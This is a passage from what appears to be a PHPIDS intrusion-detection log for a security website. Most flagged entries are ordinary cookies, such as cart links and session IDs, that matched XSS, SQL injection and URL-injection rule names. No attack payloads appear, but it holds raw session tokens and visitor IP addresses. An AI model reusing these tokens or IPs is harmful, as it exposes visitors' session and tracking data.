Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 3.1923076923077 Converted: ((((+::

ID:	59442
Name:	COOKIE.DB
Value:	msRandX=62&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:	/i.php?page=videos%2Fowasp-top-5-louisville
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:	59443
Name:	COOKIE.Cart
Value:	PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=4605321&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:	/i.php?page=videos%2Fowasp-top-5-louisville
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59444
Name:	COOKIE.IW
Value:	SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20358
Page:	/i.php?page=videos%2Fowasp-top-5-louisville
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59445
Name:	COOKIE._designrelated_id
Value:	BAh7CDoQZXhwaXJ5X3RpbWV1OglUaW1lDRZpG4A7TUHHOhJjcmVhdGlvbl90 aW1ldTsGDfZoG4DD4m7GIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG bGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8b79c2ed5d395483c2803613f3c3b143223ac77f
Page:	/i.php?page=videos%2Fowasp-top-5-louisville
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	bGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8b79c2ed5d395483c2803613f3c3b143223ac77f Impact: 7 | Tags: xss, csrf, id, rfe, lfi Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 2.6363636363636

ID:	59446
Name:	REQUEST.PREF
Value:	ID=0476ea5eac7fc9f2:TM=1257636028:LM=1257636028:S=-_VJl9eVH88obzos
Page:	/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:	59447
Name:	COOKIE.Apache
Value:	"D~51fc3947f14d8427b7d6ac529710e832"
Page:	/i.php?page=videos%2Fowasp-top-5-louisville
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 2.3333333333333

ID:	59448
Name:	REQUEST.CFGLOBALS
Value:	urltoken=CFID#=1654856&CFTOKEN#=27435994&jsessionid#=30307eacdd69846e5c15157f4023691a2b7b#lastvisit={ts '2009-11-07 13:48:18'}#timecreated={ts '2009-11-07 10:17:13'}#hitcount=6#cftoken=27435994#cfid=1654856#
Page:	/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 3.1923076923077 Converted: ((((+::

ID:	59449
Name:	REQUEST.DB
Value:	msRandX=62&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:	/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:	59450
Name:	REQUEST.Cart
Value:	PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=4605321&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:	/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59451
Name:	REQUEST.IW
Value:	SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20358
Page:	/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59452
Name:	REQUEST._designrelated_id
Value:	BAh7CDoQZXhwaXJ5X3RpbWV1OglUaW1lDRZpG4A7TUHHOhJjcmVhdGlvbl90 aW1ldTsGDfZoG4DD4m7GIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG bGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8b79c2ed5d395483c2803613f3c3b143223ac77f
Page:	/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	bGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8b79c2ed5d395483c2803613f3c3b143223ac77f Impact: 7 | Tags: xss, csrf, id, rfe, lfi Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 2.6363636363636

ID:	59453
Name:	REQUEST.Apache
Value:	"D~51fc3947f14d8427b7d6ac529710e832"
Page:	/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 2.3333333333333

ID:	59454
Name:	COOKIE.PREF
Value:	ID=0476ea5eac7fc9f2:TM=1257636028:LM=1257636028:S=-_VJl9eVH88obzos
Page:	/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:	59455
Name:	COOKIE.CFGLOBALS
Value:	urltoken=CFID#=1654856&CFTOKEN#=27435994&jsessionid#=30307eacdd69846e5c15157f4023691a2b7b#lastvisit={ts '2009-11-07 13:48:18'}#timecreated={ts '2009-11-07 10:17:13'}#hitcount=6#cftoken=27435994#cfid=1654856#
Page:	/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 3.1923076923077 Converted: ((((+::

ID:	59456
Name:	COOKIE.DB
Value:	msRandX=62&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:	/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:	59457
Name:	COOKIE.Cart
Value:	PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=4605321&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:	/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59458
Name:	COOKIE.IW
Value:	SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20358
Page:	/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59459
Name:	COOKIE._designrelated_id
Value:	BAh7CDoQZXhwaXJ5X3RpbWV1OglUaW1lDRZpG4A7TUHHOhJjcmVhdGlvbl90 aW1ldTsGDfZoG4DD4m7GIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG bGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8b79c2ed5d395483c2803613f3c3b143223ac77f
Page:	/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	bGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8b79c2ed5d395483c2803613f3c3b143223ac77f Impact: 7 | Tags: xss, csrf, id, rfe, lfi Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 2.6363636363636

ID:	59460
Name:	COOKIE.Apache
Value:	"D~51fc3947f14d8427b7d6ac529710e832"
Page:	/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 2.3333333333333

ID:	59461
Name:	REQUEST.CFGLOBALS
Value:	urltoken=CFID#=1647416&CFTOKEN#=11648233&jsessionid#=3030e2f5c781896300d41f7b23227b7d6321#lastvisit={ts '2009-11-07 11:47:27'}#timecreated={ts '2009-11-07 07:03:19'}#hitcount=9#cftoken=11648233#cfid=1647416#
Page:	/i.php?page=security%2Fxss-sql-and-command-inject-vectors
IP:	78.46.48.169
Impact:	126
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 3.1923076923077 Converted: ((((+::

ID:	59462
Name:	REQUEST.DB
Value:	msRandX=21&ItemDetailsBeta=Y&msProduct=335878&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150A.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150A.jpg
Page:	/i.php?page=security%2Fxss-sql-and-command-inject-vectors
IP:	78.46.48.169
Impact:	126
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:	59463
Name:	REQUEST.Cart
Value:	PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5311064&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:	/i.php?page=security%2Fxss-sql-and-command-inject-vectors
IP:	78.46.48.169
Impact:	126
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59464
Name:	REQUEST.RubricSession
Value:	U2FsdGVkX18dL03TMw8vwhDfKjaUKxn2cGubcPCSTMw=
Page:	/i.php?page=security%2Fxss-sql-and-command-inject-vectors
IP:	78.46.48.169
Impact:	126
Created:	2009-11-07 17:37:53
Details:	Impact: 7 | Tags: xss, csrf, id, rfe, lfi Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 2.875

ID:	59465
Name:	REQUEST.CommunityServer-UserCookie1001
Value:	lv=1/1/1999 12:00:00 AM&mra=11/7/2009 3:46:29 PM
Page:	/i.php?page=security%2Fxss-sql-and-command-inject-vectors
IP:	78.46.48.169
Impact:	126
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:	59466
Name:	COOKIE.CFGLOBALS
Value:	urltoken=CFID#=1647416&CFTOKEN#=11648233&jsessionid#=3030e2f5c781896300d41f7b23227b7d6321#lastvisit={ts '2009-11-07 11:47:27'}#timecreated={ts '2009-11-07 07:03:19'}#hitcount=9#cftoken=11648233#cfid=1647416#
Page:	/i.php?page=security%2Fxss-sql-and-command-inject-vectors
IP:	78.46.48.169
Impact:	126
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 3.1923076923077 Converted: ((((+::

ID:	59467
Name:	COOKIE.DB
Value:	msRandX=21&ItemDetailsBeta=Y&msProduct=335878&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150A.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150A.jpg
Page:	/i.php?page=security%2Fxss-sql-and-command-inject-vectors
IP:	78.46.48.169
Impact:	126
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:	59468
Name:	COOKIE.Cart
Value:	PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5311064&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:	/i.php?page=security%2Fxss-sql-and-command-inject-vectors
IP:	78.46.48.169
Impact:	126
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59469
Name:	COOKIE.RubricSession
Value:	U2FsdGVkX18dL03TMw8vwhDfKjaUKxn2cGubcPCSTMw=
Page:	/i.php?page=security%2Fxss-sql-and-command-inject-vectors
IP:	78.46.48.169
Impact:	126
Created:	2009-11-07 17:37:53
Details:	Impact: 7 | Tags: xss, csrf, id, rfe, lfi Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 2.875

ID:	59470
Name:	COOKIE.CommunityServer-UserCookie1001
Value:	lv=1/1/1999 12:00:00 AM&mra=11/7/2009 3:46:29 PM
Page:	/i.php?page=security%2Fxss-sql-and-command-inject-vectors
IP:	78.46.48.169
Impact:	126
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:	59471
Name:	REQUEST.CFGLOBALS
Value:	urltoken=CFID#=1647416&CFTOKEN#=11648233&jsessionid#=3030e2f5c781896300d41f7b23227b7d6321#lastvisit={ts '2009-11-07 11:47:27'}#timecreated={ts '2009-11-07 07:03:19'}#hitcount=9#cftoken=11648233#cfid=1647416#
Page:	/i.php?page=books
IP:	78.46.48.169
Impact:	126
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 3.1923076923077 Converted: ((((+::

ID:	59472
Name:	REQUEST.DB
Value:	msRandX=21&ItemDetailsBeta=Y&msProduct=335878&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150A.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150A.jpg
Page:	/i.php?page=books
IP:	78.46.48.169
Impact:	126
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:	59473
Name:	REQUEST.Cart
Value:	PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5311064&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:	/i.php?page=books
IP:	78.46.48.169
Impact:	126
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59474
Name:	REQUEST.RubricSession
Value:	U2FsdGVkX18dL03TMw8vwhDfKjaUKxn2cGubcPCSTMw=
Page:	/i.php?page=books
IP:	78.46.48.169
Impact:	126
Created:	2009-11-07 17:37:53
Details:	Impact: 7 | Tags: xss, csrf, id, rfe, lfi Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 2.875

ID:	59475
Name:	REQUEST.CommunityServer-UserCookie1001
Value:	lv=1/1/1999 12:00:00 AM&mra=11/7/2009 3:46:29 PM
Page:	/i.php?page=books
IP:	78.46.48.169
Impact:	126
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:	59476
Name:	COOKIE.CFGLOBALS
Value:	urltoken=CFID#=1647416&CFTOKEN#=11648233&jsessionid#=3030e2f5c781896300d41f7b23227b7d6321#lastvisit={ts '2009-11-07 11:47:27'}#timecreated={ts '2009-11-07 07:03:19'}#hitcount=9#cftoken=11648233#cfid=1647416#
Page:	/i.php?page=books
IP:	78.46.48.169
Impact:	126
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 3.1923076923077 Converted: ((((+::

ID:	59477
Name:	COOKIE.DB
Value:	msRandX=21&ItemDetailsBeta=Y&msProduct=335878&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150A.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150A.jpg
Page:	/i.php?page=books
IP:	78.46.48.169
Impact:	126
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:	59478
Name:	COOKIE.Cart
Value:	PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5311064&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:	/i.php?page=books
IP:	78.46.48.169
Impact:	126
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59479
Name:	COOKIE.RubricSession
Value:	U2FsdGVkX18dL03TMw8vwhDfKjaUKxn2cGubcPCSTMw=
Page:	/i.php?page=books
IP:	78.46.48.169
Impact:	126
Created:	2009-11-07 17:37:53
Details:	Impact: 7 | Tags: xss, csrf, id, rfe, lfi Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 2.875

ID:	59480
Name:	COOKIE.CommunityServer-UserCookie1001
Value:	lv=1/1/1999 12:00:00 AM&mra=11/7/2009 3:46:29 PM
Page:	/i.php?page=books
IP:	78.46.48.169
Impact:	126
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:	59379
Name:	REQUEST.PREF
Value:	ID=27c43181615276c1:TM=1257632984:LM=1257632984:S=h7w0cREtSBuJaWq3
Page:	/i.php?page=videos%2Fndiff-nmap-5
IP:	78.46.48.165
Impact:	172
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:	59380
Name:	REQUEST.language
Value:	--
Page:	/i.php?page=videos%2Fndiff-nmap-5
IP:	78.46.48.165
Impact:	172
Created:	2009-11-07 17:37:44
Details:	Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:	59381
Name:	REQUEST.IW
Value:	SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20362
Page:	/i.php?page=videos%2Fndiff-nmap-5
IP:	78.46.48.165
Impact:	172
Created:	2009-11-07 17:37:44
Details:	Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59382
Name:	REQUEST.CommunityServer-UserCookie1001
Value:	mra=11/7/2009 6:12:14 AM
Page:	/i.php?page=videos%2Fndiff-nmap-5
IP:	78.46.48.165
Impact:	172
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:	59383
Name:	REQUEST.CFGLOBALS
Value:	urltoken=CFID#=1647409&CFTOKEN#=43458014&jsessionid#=3030dd227a70b528e33234624e2256436e7f#lastvisit={ts '2009-11-07 15:45:40'}#timecreated={ts '2009-11-07 07:03:18'}#hitcount=9#cftoken=43458014#cfid=1647409#
Page:	/i.php?page=videos%2Fndiff-nmap-5
IP:	78.46.48.165
Impact:	172
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 3.1923076923077 Converted: ((((+::

ID:	59384
Name:	REQUEST.DB
Value:	msRandX=93&ItemDetailsBeta=Y&msProduct=1782427&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150C.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150C.jpg
Page:	/i.php?page=videos%2Fndiff-nmap-5
IP:	78.46.48.165
Impact:	172
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:	59385
Name:	REQUEST.Cart
Value:	PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5279858&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:	/i.php?page=videos%2Fndiff-nmap-5
IP:	78.46.48.165
Impact:	172
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59386
Name:	REQUEST.RubricSession
Value:	U2FsdGVkX18iVFgMfh2HBpP0qjQM8QZMZmI6QA407kc=
Page:	/i.php?page=videos%2Fndiff-nmap-5
IP:	78.46.48.165
Impact:	172
Created:	2009-11-07 17:37:44
Details:	Impact: 7 | Tags: xss, csrf, id, rfe, lfi Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 2.7058823529412

ID:	59387
Name:	COOKIE.PREF
Value:	ID=27c43181615276c1:TM=1257632984:LM=1257632984:S=h7w0cREtSBuJaWq3
Page:	/i.php?page=videos%2Fndiff-nmap-5
IP:	78.46.48.165
Impact:	172
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:	59388
Name:	COOKIE.language
Value:	--
Page:	/i.php?page=videos%2Fndiff-nmap-5
IP:	78.46.48.165
Impact:	172
Created:	2009-11-07 17:37:44
Details:	Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:	59389
Name:	COOKIE.IW
Value:	SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20362
Page:	/i.php?page=videos%2Fndiff-nmap-5
IP:	78.46.48.165
Impact:	172
Created:	2009-11-07 17:37:44
Details:	Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59390
Name:	COOKIE.CommunityServer-UserCookie1001
Value:	mra=11/7/2009 6:12:14 AM
Page:	/i.php?page=videos%2Fndiff-nmap-5
IP:	78.46.48.165
Impact:	172
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:	59391
Name:	COOKIE.CFGLOBALS
